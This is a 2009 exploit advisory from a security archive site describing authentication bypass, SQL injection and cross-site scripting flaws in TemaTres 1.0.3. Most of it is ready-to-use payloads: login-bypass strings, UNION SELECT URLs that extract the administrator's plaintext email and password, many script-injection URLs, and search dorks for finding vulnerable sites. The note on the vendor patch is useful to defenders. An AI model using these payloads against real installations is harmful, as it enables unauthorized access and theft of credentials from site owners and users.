TemaTres 1.0.3 SQL Injection / XSS

TemaTres 1.0.3 SQL Injection / XSS: Posted May 5, 2009; Authored by YEnH4ckEr; TemaTres version 1.0.3 suffers from authentication bypass, SQL injection, and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, sql injection; SHA-256 | 000a02b57e57c10486f0f0a2c22f028e70d708ebec7fd79436ef113b4c202119; Download | Favorite | View

TemaTres 1.0.3 SQL Injection / XSS


---------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES--TemaTres 1.0.3-->
---------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.r020.com.ar/tematres/
-->DOWNLOAD: http://sourceforge.net/projects/tematres/
-->DEMO: http://www.r020.com.ar/tematres/index.php
-->CATEGORY: CMS / Portals
-->DESCRIPTION: Web application to manage controlled vocabularies, taxonomies and thesaurus...

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORKs: "Powered by TemaTres" / "Generado por TemaTres" / "Criado por TemaTres"
-->CATEGORY: AUTH BYPASS/ SQL INJECTION/ XSS
-->AFFECT VERSION: LAST = 1.0.3 (maybe <= ?)
-->Discovered Bug date: 2009-04-23
-->Reported Bug date: 2009-04-23
-->Fixed bug date: 2009-05-04
-->Info patch (v1.0.31): http://www.r020.com.ar/tematres/tematres1.031.zip
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!).


############
------------
CONDITIONS:
------------
############


**gpc_magic_quotes=off

**DBPREFIX='lc_' (Default)


####################
--------------------
AUTH BYPASS (SQLi):
--------------------
####################


mail:' or 1=1 /*
password: Nothing

Or...

mail: Something
password:' or 1=1 /*


######################
----------------------
SQL INJECTION (SQLi):
----------------------
######################


~~~~~~---->Unregistered user (get var --> 'letra'):

http://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*

<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>

~~~~~~---->Resgistered user (get vars --> 'y' and 'm'):

http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*

http://[HOST]/[HOME_PATH]/sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*&y=2007

<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>



############################
----------------------------
CROSS SITE SCRIPTING (XSS):
----------------------------
############################


There are a lot of links (This isn't entire list):


~~~------->Unregistered user


<----Search form---->

<script>while(1){alert('y3nh4ck3r was here!')}</script>


<----More links---->

http://[HOST]/[HOME_PATH]/index.php?_expresion_de_busqueda=<script>alert('y3nh4ck3r was here!')</script>&sgs=off

http://[HOST]/[HOME_PATH]/index.php?letra=D<script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/index.php?estado_id=14"><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/index.php?tema="><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/index.php?tema=2&/trmino-subordinado-de-ejemplo"><script>alert('y3nh4ck3r was here!')</script>


~~~------->Registered user


<----Posting here---->

http://[HOST]/[HOME_PATH]/index.php?edit_id=12&tema=12

<script>alert('y3nh4ck3r was here!')</script>


<----More links---->

http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007"><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007&ord=F"><script>alert('y3nh4ck3r was here!')</script>

http://[HOST]/[HOME_PATH]/sobre.php?m=10"><script>alert('y3nh4ck3r was here!')</script>&y=2007


#######################################################################
#######################################################################
##*******************************************************************##
##            ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2k ...         ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 90 files
Gentoo 31 files
Debian 23 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,077)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,339)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,263)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,651)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

TemaTres 1.0.3 SQL Injection / XSS

TemaTres 1.0.3 SQL Injection / XSS

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

TemaTres 1.0.3 SQL Injection / XSS

Share This

TemaTres 1.0.3 SQL Injection / XSS

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems